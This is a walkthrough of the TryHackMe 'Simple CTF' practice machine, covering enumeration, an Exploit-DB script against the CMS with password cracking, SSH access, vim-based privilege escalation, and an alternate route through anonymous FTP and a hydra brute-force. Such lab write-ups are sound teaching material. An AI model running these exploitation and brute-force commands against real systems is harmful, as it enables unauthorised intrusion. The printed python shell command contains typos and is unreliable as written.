Simple CTF — Walkthrough

Today we are going to solve the TryHackMe machine Simple CTF

Firstly, connect to the THM machine using VPN and start the machine

  1. We will start with Nmap Scan

nmap -Pn <ip>

2. Use Dirbuster to find the directories and files names on web server

We can see there are so many subdomain, we start with /simple/

We can see CMS version at the end of Page

3. Search for Exploits in Google based on the CMS Version

We found the CVE based on our version

Based on our version we found the exploit in Exploit-DB

4. Download the Exploit and edit if any changes required based on the Python Modules

python 46635.py -u http://<ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

It will crack the username and password

5. Now, try to login using the SSH

ssh -p2222 mitch@<ip>

Check the user id

id

6. Now, look for the User Flag user.txt

cat user.txt

7. Here, we have to perform Privilege Escalation

8. Go to Gtfobins and search vim

9. We got the root shell and to get the interactive shell we have a python command

python -c ‘import pty:pty.spawn(“/bin/bash”)’

10. Now look for root flag

cd /root

ls

We found the flag in the /root folder

cat root.txt

Second Method:

  • Since we already know that FTP has anonymous access
  • We will login through FTP

ftp <ip>

  • Check for any sensitive information, we found a folder name ‘pub’

ls

  • Check whether the folder contains any information

cd pub

  • We can see a file name called ‘ForMitch.txt’, Open the file

cat ForMitch.txt

  • We can assume that one of the user named as Mitch, Now, we will try to brute-force using hydra

hydra -l mitch -P /usr/share/wordlists/rockyou.txt <ip> -s <port> -t 4 ssh

  • Since we have the username and password we will login through SSH and get the user flag and perform Privilege Escalation and Obtain the root shell

This concludes the room and both flags have been captured!

Penetration Tester| WAPT | Bug Bounty Hunter